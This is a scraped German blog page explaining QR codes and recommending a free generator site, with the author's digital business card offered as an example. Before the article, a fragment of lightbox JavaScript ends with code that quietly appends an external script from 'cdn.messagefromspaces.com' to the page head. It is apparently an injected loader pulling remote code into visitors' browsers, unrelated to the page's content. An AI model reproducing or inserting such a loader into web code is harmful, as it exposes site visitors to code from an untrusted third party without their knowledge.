, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

QR Codes erstellen

weiterempfehlen

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS


QR-Codes erfreuen sich in der werblichen Kommunikation einer stetig wachsendenden Beliebtheit und sind vielseitig einsetzbar. Der QR-Code (englisch: Quick Response, „schnelle Antwort“) ist ein zweidimensionaler Code, der mit den gängigen Verfahren gedruckt und auch digital dargestellt werden kann.. Wie beim Strichcode ist auch hier ein hoher Kontrast wichtig, idealerweise schwarz auf weiß. In der Darstellungsgröße ist dem QR-Code keine Grenze gesetzt, solange das Lesegerät das Bild formatfüllend und differenziert aufnehmen kann. Es wurden neben Postkarten, Homepages und T-Shirts auch schon Plakatwände und Häuserfassaden mit einem einzigen QR-Code versehen.

Im Internet finden sich zahlreiche Anbieter kostenfreier und kostenpflichtiger QR-Code-Generatoren. Auf der der Homepage http://goqr.me/ können Sie QR-Codes komplett kostenlos erstellen (kommerzielle Nutzung und Druck sind erlaubt).

 
Als Beispiel finden Sie nachfolgend meine elektronische Visitenkarte als QR-Code.
Zum Abrufen der Daten richten Sie einfach Ihr Handy auf den Code. Fotografieren Sie den Code zum decodieren der Daten. Fertig!

QR Code generator


Email
Print
WP Socializer Aakash Web